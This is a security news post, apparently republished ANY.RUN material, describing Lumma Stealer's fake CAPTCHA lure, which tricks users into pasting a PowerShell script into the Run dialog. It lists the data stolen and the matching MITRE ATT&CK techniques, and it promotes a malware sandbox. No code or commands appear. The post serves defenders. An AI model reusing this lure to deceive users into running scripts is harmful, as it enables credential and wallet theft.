A Recent Fake CAPTCHA Attack

   October 17, 2024  Posted in CyberSecurityNews


Lumma Stealer, also known as LummaC2, is a widely known malware that first surfaced in 2022. Since then, it has steadily evolved, improving its techniques for stealing sensitive information.

Lumma Stealer targets a wide range of credentials, including browser-stored passwords, cryptocurrency wallets, and other valuable information. 

SIEM as a Service

One of its most recent tactics involves using fake CAPTCHA pages as a disguise to trick users into executing the malware, making it a persistent and dangerous threat in the cybersecurity landscape.

What Lumma Stealer Targets

The targets of Lumma Stealer attacks usually vary, however some of the main targets of this malware include:

  • Cryptocurrency wallets: Steals private keys and wallet credentials, making it a significant threat to crypto users.
  • Browser data: Collects browser-stored passwords, cookies, and browsing history, giving attackers easy access to accounts and personal information.
  • Credit card information: Extracts stored credit card details from browser extensions and form autofill data.
  • Two-Factor Authentication (2FA): Attempts to bypass 2FA by capturing authentication tokens and backup codes, allowing attackers to gain unauthorized access to accounts.

Technical Capabilities and Functionalities of Lumma Stealer

Lumma Stealer provides cybercriminals with several advanced functionalities, making it an effective tool for information theft and further exploitation. Key features include:

  • Data exfiltration: It extracts sensitive data from browsers, cryptocurrency wallets, and applications, focusing on credentials, financial info, and personal data.
  • Automatic updates: Lumma Stealer receives regular updates from its Command-and-Control (C2) servers to enhance evasion techniques and introduce new capabilities.
  • Data logging: The stealer compiles logs from infected systems, including browser data and clipboard content, for further exploitation.
  • Loader capability: It acts as a loader, enabling the drop of additional malware, expanding the attack vector to include ransomware or trojans.

Analyze Malware in Linux & Windows VMs

Sign up for a Free ANY.RUN account to access interactive malware analysis with no limit.

Investigate any threat with ease.

Fake CAPTCHA Pages Exploited by Lumma Stealer in Recent Attacks

Lumma Stealer employs multiple distribution methods, including phishing emails, malicious downloads, and exploit kits. 

However, one of its more recent and deceptive tactics involves the use of fake CAPTCHA pages designed to trick users into executing malicious scripts. 

This method has proven highly effective for attackers, as it exploits the trust users place in CAPTCHA challenges, which are typically seen as legitimate security checks to verify human identity.

In a campaign recently observed through ANY.RUN’s malware sandbox, victims were prompted to complete a CAPTCHA to “fix” non-existent display errors or prove they were not bots.

However, a malicious script was disguised as a solution. The victim was instructed to copy and execute a PowerShell script via the WIN+R (Run) function. This led directly to the system being compromised by Lumma Stealer.

Check out a sandbox session showing this attack in detail. 

Fake CAPTCHA inside ANY.RUN’s sandbox

The sandbox displays the fake messages that attackers use to make the potential victims believe they need to run a specific script inside their computer to solve the current problem.

Fake messages used in Lumma attacks

The Lumma infection begins after users copy the malware script and paste it to Run window and execute it. 

Start of the infection chain 

Once the malware is live, you can track how Lumma Stealer establishes communication with its Command-and-Control (C2) server, focusing on extracting sensitive data like browser-stored passwords, cryptocurrency keys, and even 2FA tokens.

ANY.RUN’s sandbox captures these interactions, showing the malware’s behavior in an isolated environment.

Command and Control activity detected by ANY.RUN

In this specific case of Lumma Stealer distribution via fake CAPTCHA pages, several MITRE ATT&CK techniques were observed:

MITRE ATT&CK TTPs used in Lumma Attack
  • Command and Scripting Interpreter: PowerShell – The attack relies heavily on PowerShell scripts executed by the user. After being tricked into running the malicious script through the WIN+R command, PowerShell is used to initiate the malware, which is a common technique for system exploitation.
  • User Execution: Malicious File – This technique is exploited when the user is convinced to execute the malicious file (the PowerShell script) under the belief that it will solve the CAPTCHA-related problem. 
  • Masquerading: Rename System Utilities – The malware script renames system utilities to appear legitimate or disguise its activity. 
  • Hide Artifacts: Hidden Window – Once executed, the malware may use a hidden window or background processes to avoid alerting the user to any suspicious activity. This technique helps ensure the malware can continue running undetected while carrying out its data exfiltration.

Analyze Malware Securely with ANY.RUN’s Sandbox

To fully understand how malware operates, you can use ANY.RUN’s interactive malware sandbox to observe the entire infection chain in real time.

From initial infection to data exfiltration, the sandbox provides a comprehensive view of how malicious software operates. Track each step of the attack chain in a controlled environment, making it easier to detect and understand malware tactics without risking live systems.

Try ANY.RUN sandbox for 14 days for free



Source link